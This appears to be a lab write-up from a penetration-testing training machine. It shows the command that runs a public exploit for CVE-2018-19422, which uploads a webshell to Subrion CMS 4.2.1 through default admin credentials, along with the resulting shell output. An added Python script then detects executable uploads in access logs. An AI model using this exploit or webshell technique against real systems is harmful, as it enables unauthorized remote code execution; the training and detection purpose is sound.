CVE-2018-19422


The target Subrion instance appears to be vulnerable to CVE-2018-19422 because it runs an outdated version, 4.2.1.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/exfiltrated]
└─$ python3 CVE-2018-19422.py --url http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 
 
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: mtOiqqQRC66PFNNsZh6OynFTeXzjwAPK2YA5Thd9
[+] Trying to log in...
[+] Login Successful!
 
[+] Generating random name for Webshell...
[+] Generated webshell name: vwpwdfclqtysurc
 
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/vwpwdfclqtysurc.phar 
 
$ whoami  
www-data
 
$ hostname
exfiltrated
 
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:aa:a9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.202.163/24 brd 192.168.202.255 scope global ens160
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the www-data account by exploiting CVE-2018-19422.
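
On the defending side, the session above leaves one clear artifact in the web server's access log: requests to a .phar file under /panel/uploads/. The following is an added detection example, not part of the original write-up; the log lines, client addresses and extension list are constructed assumptions. It flags requests to PHP-executable file names below an upload directory in combined-format logs.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Extensions a PHP handler mapping may execute; this list is an assumption,
# align it with the web server's real configuration.
PHP_EXEC_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar"}

# Leading fields of the Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def executable_upload_hits(lines, upload_dir="/uploads/"):
    """Map (client_ip, path) -> [(timestamp, method, status), ...] for requests
    to PHP-executable file names below an upload directory."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Drop the query string, decode %xx escapes, ignore case.
        path = unquote(urlsplit(m["target"]).path).lower()
        if upload_dir not in path:
            continue
        # Inspect every segment and every extension below the upload dir, so
        # x.phar/extra (PATH_INFO) and x.phar.jpg (double extension) match too.
        for segment in path.split(upload_dir, 1)[1].split("/"):
            if PHP_EXEC_EXT.intersection(segment.split(".")[1:]):
                hits[(m["ip"], path)].append((m["ts"], m["method"], int(m["status"])))
                break
    return dict(hits)

# Constructed sample lines; addresses and timestamps are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /panel/uploads/vwpwdfclqtysurc.phar?x=1 HTTP/1.1" 200 9 "-" "-"',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /panel/uploads/vwpwdfclqtysurc.phar?x=2 HTTP/1.1" 200 12 "-" "-"',
    '10.0.0.7 - - [01/Jan/2024:10:02:00 +0000] "GET /panel/uploads/logo.png HTTP/1.1" 200 5120 "-" "-"',
    '10.0.0.8 - - [01/Jan/2024:10:03:00 +0000] "GET /panel/uploads/a.PhAr/extra HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.9 - - [01/Jan/2024:10:04:00 +0000] "GET /panel/uploads/b.%70har HTTP/1.1" 200 3 "-" "-"',
    '10.0.0.9 - - [01/Jan/2024:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 800 "-" "-"',
]

if __name__ == "__main__":
    for (ip, path), events in executable_upload_hits(SAMPLE_LOG).items():
        print(f"{ip} {path} {len(events)} request(s), statuses {[e[2] for e in events]}")
```

A 200 response on a flagged path means the file exists and was served or executed, so those hits deserve triage first; upload directories should normally serve only static content.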